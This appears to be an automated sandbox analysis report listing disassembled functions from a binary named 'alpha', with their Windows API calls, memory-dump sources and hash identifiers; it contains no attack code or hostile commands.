                                                                                                          • Instruction ID: b32249fd8902427561cef4e95d1912c07f66a50c8e469a3ca7b8610c069ec178
                                                                                                          • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                          • Instruction Fuzzy Hash: B611E65260A74185EB1AAB69F405279F6A0FF4979DF868132DD0D07770EF3CE0458724
                                                                                                          Function 00007FF7AB1258D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                          • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                          • API String ID: 3677997916-3870813718
                                                                                                          • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                          • Instruction ID: 1cbb613715ebb9b8ff69e808273d2b6720aa2aa1e8b704bb7edb11b3f315389a
                                                                                                          • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                          • Instruction Fuzzy Hash: 3A110A7661AA41C7EB119B58F48466AF7A4FB89768F814235DA8D0377CDF7CD048CB10
                                                                                                          Function 00007FF7AB124C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memsetwcsrchr$wcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 110935159-0
                                                                                                          • Opcode ID: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                                          • Instruction ID: 3e71a80c6363e39b8fa977fa23fabc4189ef155862b23c78e5e4b0753237e03c
                                                                                                          • Opcode Fuzzy Hash: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                                          • Instruction Fuzzy Hash: D551D862B0A78685FE22AB19F4003F9D290BF59BACF964531CE5D4B7B4EE3CD5458310
                                                                                                          Function 00007FF7AB135EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$CurrentDirectorytowupper
                                                                                                          • String ID:
                                                                                                          • API String ID: 1403193329-0
                                                                                                          • Opcode ID: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                                          • Instruction ID: 8c590ac0c0a440f8491318cabe8cce9bfcb42fcc233c2ad99c2eeba23fd4e69e
                                                                                                          • Opcode Fuzzy Hash: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                                          • Instruction Fuzzy Hash: 4D51992760B68185EB6AAF28E4456B9B7A0FF4575CFC68135CA0D076B4FF3CD5488720
                                                                                                          Function 00007FF7AB1291C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00007FF7AB12921C
                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7AB1293AA
                                                                                                            • Part of subcall function 00007FF7AB128B20: wcsrchr.MSVCRT ref: 00007FF7AB128BAB
                                                                                                            • Part of subcall function 00007FF7AB128B20: _wcsicmp.MSVCRT ref: 00007FF7AB128BD4
                                                                                                            • Part of subcall function 00007FF7AB128B20: _wcsicmp.MSVCRT ref: 00007FF7AB128BF2
                                                                                                            • Part of subcall function 00007FF7AB128B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB128C16
                                                                                                            • Part of subcall function 00007FF7AB128B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB128C2F
                                                                                                            • Part of subcall function 00007FF7AB128B20: wcschr.MSVCRT ref: 00007FF7AB128CB3
                                                                                                            • Part of subcall function 00007FF7AB13417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB1341AD
                                                                                                            • Part of subcall function 00007FF7AB133060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7AB1292AC), ref: 00007FF7AB1330CA
                                                                                                            • Part of subcall function 00007FF7AB133060: SetErrorMode.KERNELBASE ref: 00007FF7AB1330DD
                                                                                                            • Part of subcall function 00007FF7AB133060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB1330F6
                                                                                                            • Part of subcall function 00007FF7AB133060: SetErrorMode.KERNELBASE ref: 00007FF7AB133106
                                                                                                          • wcsrchr.MSVCRT ref: 00007FF7AB1292D8
                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB129362
                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB129373
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 3966000956-0
                                                                                                          • Opcode ID: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                                          • Instruction ID: 4c29e2c0e65bb5c412cde1a0a44283279456eeb7e989095de1142ca1060ecd17
                                                                                                          • Opcode Fuzzy Hash: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                                          • Instruction Fuzzy Hash: 7A51A632A0A682C5EB66AF29F4502B9B3A0FF49798F864035DA4D077B5EF3CE555C310
                                                                                                          Function 00007FF7AB122A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$_setjmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 3883041866-0
                                                                                                          • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                          • Instruction ID: 67abfed8474dbeb56b5977c610b0067f174b864d63b767495f9727306f9dbbfd
                                                                                                          • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                          • Instruction Fuzzy Hash: 6D519032609B86CAEB62DF28E8403E9B3A4FB4974CF814135DA4D47A68DF3CD644CB50
                                                                                                          Function 00007FF7AB12B49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB12B4BD
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306D6
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306F0
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB13074D
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB130762
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB12B518
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB12B58B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                          • String ID: ELSE$IF/?
                                                                                                          • API String ID: 3223794493-1134991328
                                                                                                          • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                          • Instruction ID: b4b62f9743cb5160e610794e5d42d3ab61ae9b845c1e834275842a910d89e095
                                                                                                          • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                          • Instruction Fuzzy Hash: 9F418A21E0B643C1FB56BB2CF4912BAA2A1AF44748FDA4435D60E072B5EE3DE8448760
                                                                                                          Function 00007FF7AB14E3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 1532185241-0
                                                                                                          • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                          • Instruction ID: 86efbdb6e8d18d083c628c11545aa982752947a615418c1bab32c8b38cecc202
                                                                                                          • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                          • Instruction Fuzzy Hash: 45411472A057418BE716AB28F44097DFBA1FB88B44F864935EA0A437B4DF3CE8018710
                                                                                                          Function 00007FF7AB124FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3588551418-0
                                                                                                          • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                          • Instruction ID: d48c501996f03ed4117ac514b237ed5e4d440a4130dba2b2c44ba5a069dd7792
                                                                                                          • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                          • Instruction Fuzzy Hash: AD41D471A1A242CBE71A6B19F49027DF661FF45B49F964038DA0E477B1DF3CE8408760
                                                                                                          Function 00007FF7AB14E558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 2123716050-0
                                                                                                          • Opcode ID: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                                          • Instruction ID: a6edb1c5167ef34658611f576c48ae122e62f00aa4052ebf82d2b5f1716bddd2
                                                                                                          • Opcode Fuzzy Hash: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                                          • Instruction Fuzzy Hash: EC41B3727067C28AEB769F29E8503E9A794FB4974CF454134DA4D4AAA8EF3CD2488710
                                                                                                          Function 00007FF7AB1265F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3114114779-0
                                                                                                          • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                          • Instruction ID: a07bd755e23130c9497e8242552c764880c2b08dbbc20fe090277e0a72366ecd
                                                                                                          • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                          • Instruction Fuzzy Hash: E5414A32A06B42CAE7019F69E4402ACB7A5FB5874CF964135EA0E937B8DF38D416C760
                                                                                                          Function 00007FF7AB14A73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A77A
                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A7AF
                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A80E
                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A839
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A850
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue$CloseErrorLastOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2240656346-0
                                                                                                          • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                          • Instruction ID: e2a137e8acfb2b36b0fe94d2dc5ea63b1329263d4349d3f318ff1510d3a492de
                                                                                                          • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                          • Instruction Fuzzy Hash: 7731937262AA8282E7529F19F440479F7A4FF88795F964134EA4E43774EF3CD481CB10
                                                                                                          Function 00007FF7AB14D0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB1301B8: _get_osfhandle.MSVCRT ref: 00007FF7AB1301C4
                                                                                                            • Part of subcall function 00007FF7AB1301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB1301D6
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB14D0F9
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7AB14D10F
                                                                                                          • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7AB14D166
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB14D17A
                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7AB14D18C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3008996577-0
                                                                                                          • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                          • Instruction ID: 6528426f2a6235511c4b8ba08a261f9048e481811f33dc54597ef47eb3e98fc9
                                                                                                          • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                          • Instruction Fuzzy Hash: 52215C26B25A51CAE701AB79F4400BDB7B0FB4DB48B855225EE0E53B68EF38D044CB24
                                                                                                          Function 00007FF7AB145770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateSemaphore
                                                                                                          • String ID: _p0$wil
                                                                                                          • API String ID: 1078844751-1814513734
                                                                                                          • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                          • Instruction ID: 848254be0c9f0fc6057eed8ad99b1d7b167b1acc01a35dc59e8cb5771495338c
                                                                                                          • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                          • Instruction Fuzzy Hash: 4251D6B2B1B64286EE23AB1DE4542B9E290AF8479CFD64535DA0D077B5EE3DE4058320
